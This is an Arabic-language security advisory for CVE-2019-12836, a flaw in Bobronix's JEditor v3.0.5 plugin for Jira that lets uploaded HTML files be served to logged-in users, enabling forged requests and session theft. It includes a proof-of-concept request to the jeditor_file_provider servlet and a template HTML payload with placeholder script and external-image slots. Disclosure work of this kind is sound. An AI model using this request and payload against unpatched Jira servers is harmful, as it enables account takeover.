
CVE-2019-12836

JEditor v3.0.5 - محرر WYSIWYG لـ JIRA
محرر نصوص غني بسيط وقوي لـ Jira. استيراد رسائل HTML الإلكترونية، لصق المحتويات الغنية، إنشاء قوالب وملء الحقول مسبقًا.
Bobronix
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12836
JEditor - محرر WYSIWYG لـ Jira - v3.0.5
JEditor v3.0.5
محرر Bobronix JEditor قبل الإصدار v3.0.6 لـ Jira يسمح للمهاجم بإضافة عنوان URL/رابط (لمشكلة موجودة) يمكن أن يسبب تزوير طلب إلى نطاق خارجي. وهذا بدوره قد يسمح بطلب مزور يمكن استدعاؤه في سياق مستخدم مصادق عليه، مما يؤدي إلى سرقة رموز الجلسة والاستيلاء على الحساب.
JEditor v3.0.5 يسمح بتحميل ملفات بأنواع متعددة من الامتدادات، أحدها هو '.HTML'. يتم استخدام JEditor بواسطة JIRA لوظيفة تحميل الملفات. باستخدام هذه الوظيفة، يمكن للمهاجم تحميل محتوى ضار.
بمجرد تحميل المحتوى الضار، يمكن تقديم طلب لاحق للمحتوى مما يسمح بعرض وتقديم المحتوى ضمن سياق أي متصفح لمستخدم مصادق عليه. قد يسمح هذا للمهاجم بتزوير طلب ضار نيابة عن أي مستخدم مصادق عليه.
تزوير الطلب عبر المواقع (CSRF)
تم إصلاح الخلل في JEditor v3.0.6
https://jeditor.zendesk.com/hc/en-us/articles/360029430751-JEditor-3-0-6-release-notes
يسمح بطلب مزور مما يؤدي إلى إمكانية ناقل هجوم من جانب العميل
مطلوب مستخدم مصادق عليه للتفاعل مع الرابط/URL المضمن
الفضل: Victor Hanna (Exploit Security)
GET /plugins/servlet/jeditor_file_provider?imgId=ckupload201906162566696393384747423&fileName=C%3A%5Ctemp%5CPOC.html HTTP/1.1
Host: <vulnerable host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0)
Accept: text/html,application/xhtml_xml,application/xml;q=0.9,*/*;q=0.8
Accept-Langauge: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<vulnerable host>/secure/Dashboard.jspa
DNT: 1
Connection: close
Cookie: atlassian.xsrf.token=BNXD-VY4I-RCJA-J3YA_34d13dd7fae0f32023fc89838ldc0b6c35991382_lin; JSESSION=42E9F5581BAE499E3E9E45B9D44E6F3C
Upgrade-Insecure-Requests: 1
HTTP/1.1 200
Server: nginx/1.10.2
Date: Sun, 16 Jun 2019 03:06:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
X-AREQUESTID: 786x226666x1
X-ASESSIONID: pn6xpm
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-ASEN: SEN-2322842
X-Seraph-LoginReason: OK
X-AUSERNAME:
Content-Disposition: inline; filename="C:\temp\POC.html"
Vary: User-Agent
Content-Length: 236
<html>
<head>
<img src="http://{insert external image location here}">
<script>{JS Payload of any description}</script>
</head>
<body>
<h1>
Welcome to the Jungle !
</h1>
</body>
</html>
Victor Hanna من Exploit Security